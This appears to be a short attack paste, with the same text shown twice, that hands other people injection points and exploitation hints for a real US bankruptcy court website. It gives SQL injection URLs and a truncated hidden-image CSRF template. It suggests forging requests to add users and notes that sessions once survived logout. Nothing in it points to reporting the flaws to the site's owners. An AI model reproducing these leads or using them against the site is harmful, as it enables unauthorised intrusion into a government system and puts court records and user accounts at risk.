Have fun guise 
SQLi:
www2.vaeb.uscourts.gov/oz/index.php?t=tinf&id=2340'
www2.vaeb.uscourts.gov/oz/supporter/print.php?id=[SQLi]
XSS:
CSRF:
<html>
<body>
<img style="display:none;" src="
</body>
</html>
About the CSRF: Don't have time to spend on it but sure you can try to make one to add users, it was based on POST request so, if there are no tokens(I'm pretty sure there aren't any) you can make it possible.
Ohh and a few months back their cookie sessions were still alive even tho you log out so check that out.
Cheers....
SQLi:
www2.vaeb.uscourts.gov/oz/index.php?t=tinf&id=2340'
www2.vaeb.uscourts.gov/oz/supporter/print.php?id=[SQLi]
XSS:
CSRF:
<html>
<body>
<img style="display:none;" src="
</body>
</html>
About the CSRF: Don't have time to spend on it but sure you can try to make one to add users, it was based on POST request so, if there are no tokens(I'm pretty sure there aren't any) you can make it possible.
Ohh and a few months back their cookie sessions were still alive even tho you log out so check that out.
Cheers....